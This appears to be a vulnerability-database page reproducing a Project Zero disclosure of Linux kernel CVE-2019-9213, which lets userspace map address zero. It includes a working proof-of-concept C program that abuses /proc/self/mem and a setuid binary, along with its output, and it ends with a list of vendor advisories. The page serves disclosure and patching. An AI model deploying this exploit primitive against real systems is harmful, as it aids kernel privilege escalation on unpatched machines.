Lucene search
CVE 0dayCVE0DAY:BBA68D15DA972E6C972FE844923C75CEHistoryMar 06, 2019 - 1:41 p.m.
Linux Kernel CVE-2019-9213 NULL Dereferences
2019-03-0613:41:31
CVE 0day
www.cve0day.com
78
0.001 Low
EPSS
Percentile
35.0%
By following the codepath that Andrea Arcangeli pointed out in his mails
regarding the last bug I reported, I noticed that it is possible for userspace
on a normal distro to map virtual address 0, which on an X86 system without SMAP
enables the exploitation of kernel NULL pointer dereferences.
The problem is in the following code path:
mem_write -> mem_rw -> access_remote_vm -> __access_remote_vm
-> get_user_pages_remote -> __get_user_pages_locked -> __get_user_pages
-> find_extend_vma
Then, if the VMA in question has the VM_GROWSDOWN flag set:
expand_stack -> expand_downwards -> security_mmap_addr -> cap_mmap_addr
This, if the address is below dac_mmap_min_addr, does a capability check:
ret = cap_capable(current_cred(), &init_user_ns, CAP_SYS_RAWIO,
SECURITY_CAP_AUDIT);
But this check is performed against current_cred(), which are the creds of the
task doing the write(), not the creds of the task whose VMA is being changed.
To reproduce:
user@deb10:~/stackexpand$ cat nullmap.c
#include <sys/mman.h>
#include <err.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
int main(void) {
void *map = mmap((void*)0x10000, 0x1000, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_GROWSDOWN|MAP_FIXED, -1, 0);
if (map == MAP_FAILED) err(1, "mmap");
int fd = open("/proc/self/mem", O_RDWR);
if (fd == -1) err(1, "open");
unsigned long addr = (unsigned long)map;
while (addr != 0) {
addr -= 0x1000;
if (lseek(fd, addr, SEEK_SET) == -1) err(1, "lseek");
char cmd[1000];
sprintf(cmd, "LD_DEBUG=help su 1>&%d", fd);
system(cmd);
}
system("head -n1 /proc/$PPID/maps");
printf("data at NULL: 0x%lx\n", *(unsigned long *)0);
}
user@deb10:~/stackexpand$ gcc -o nullmap nullmap.c && ./nullmap
00000000-00011000 rw-p 00000000 00:00 0
data at NULL: 0x706f2064696c6156
user@deb10:~/stackexpand$
References
https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2
Related
cve
cve
CVE-2019-9213
2019-03-05 22:29:00
nvd
nvd
CVE-2019-9213
2019-03-05 22:29:00
openvas
openvas
Mageia: Security Advisory (MGASA-2019-0120)
2022-01-28 00:00:00
Fedora Update for kernel-headers FEDORA-2019-87e7046631
2019-05-07 00:00:00
openSUSE: Security Advisory for the Linux Kernel (openSUSE-SU-2019:1085-1)
2019-04-03 00:00:00
ubuntucve
ubuntucve
CVE-2019-9213
2019-03-05 00:00:00
nessus
nessus
Fedora 29 : kernel / kernel-headers (2019-87e7046631)
2019-03-11 00:00:00
openSUSE Security Update : the Linux Kernel (openSUSE-2019-1085)
2019-04-01 00:00:00
Amazon Linux 2 : kernel (ALAS-2019-1179)
2019-03-29 00:00:00
cvelist
cvelist
CVE-2019-9213
2019-03-05 22:00:00
prion
prion
Null pointer dereference
2019-03-05 22:29:00
debiancve
debiancve
CVE-2019-9213
2019-03-05 22:29:00
zdt
zdt
redhatcve
redhatcve
CVE-2019-9213
2020-04-05 04:59:32
mageia
mageia
Updated kernel packages fix security vulnerability
2019-03-29 18:51:06
Updated kernel-linus packages fixes security vulnerabilities
2019-05-16 11:25:22
Updated kernel-tmb packages fixes security vulnerabilities
2019-05-16 11:25:22
fedora
fedora
[SECURITY] Fedora 29 Update: kernel-headers-4.20.14-200.fc29
2019-03-10 18:25:36
[SECURITY] Fedora 28 Update: kernel-headers-4.20.14-100.fc28
2019-03-11 20:20:34
[SECURITY] Fedora 29 Update: kernel-4.20.14-200.fc29
2019-03-10 18:25:36
amazon
amazon
Important: kernel
2019-03-20 22:39:00
Important: kernel
2019-03-21 19:26:00
packetstorm
packetstorm
Reliable Datagram Sockets (RDS) rds_atomic_free_op Privilege Escalation
2020-01-22 00:00:00
suse
suse
Security update for the Linux Kernel (important)
2019-03-30 00:00:00
Security update for the Linux Kernel (important)
2019-04-12 00:00:00
metasploit
metasploit
exploitdb
exploitdb
redhat
redhat
(RHSA-2019:1480) Important: kernel-rt security and bug fix update
2019-06-17 19:45:02
(RHSA-2019:1479) Important: kernel security and bug fix update
2019-06-17 17:30:08
(RHSA-2019:0831) Important: kernel-alt security and bug fix update
2019-04-23 12:37:36
oraclelinux
oraclelinux
Unbreakable Enterprise kernel security update
2019-04-12 00:00:00
kernel security and bug fix update
2019-07-30 00:00:00
Unbreakable Enterprise kernel security update
2022-09-06 00:00:00
ubuntu
ubuntu
Linux kernel vulnerabilities
2019-04-02 00:00:00
Linux kernel (Trusty HWE) vulnerabilities
2019-04-02 00:00:00
Linux kernel (HWE) vulnerabilities
2019-04-02 00:00:00
photon
photon
Critical Photon OS Security Update - PHSA-2019-0221
2019-04-01 00:00:00
Important Photon OS Security Update - PHSA-2019-0142
2019-03-19 00:00:00
Important Photon OS Security Update - PHSA-2019-0007
2019-03-20 00:00:00
cloudfoundry
cloudfoundry
USN-3931-2: Linux kernel (HWE) vulnerabilities | Cloud Foundry
2019-04-12 00:00:00
USN-3932-2: Linux kernel (Xenial HWE) vulnerabilities | Cloud Foundry
2019-04-12 00:00:00
debian
debian
[SECURITY] [DLA 1771-1] linux-4.9 security update
2019-05-03 10:07:46
[SECURITY] [DLA 1731-2] linux regression update
2019-04-01 18:39:17
[SECURITY] [DLA 1731-1] linux security update
2019-03-27 16:39:16
osv
osv
linux-4.9 - security update
2019-04-29 00:00:00
linux - security update
2019-03-26 00:00:00
slackware
slackware
[slackware-security] kernel
2019-06-18 22:33:08
lenovo
lenovo
AMI MegaRAC SP-X BMC Vulnerabilities - Lenovo Support US
2020-04-13 19:22:04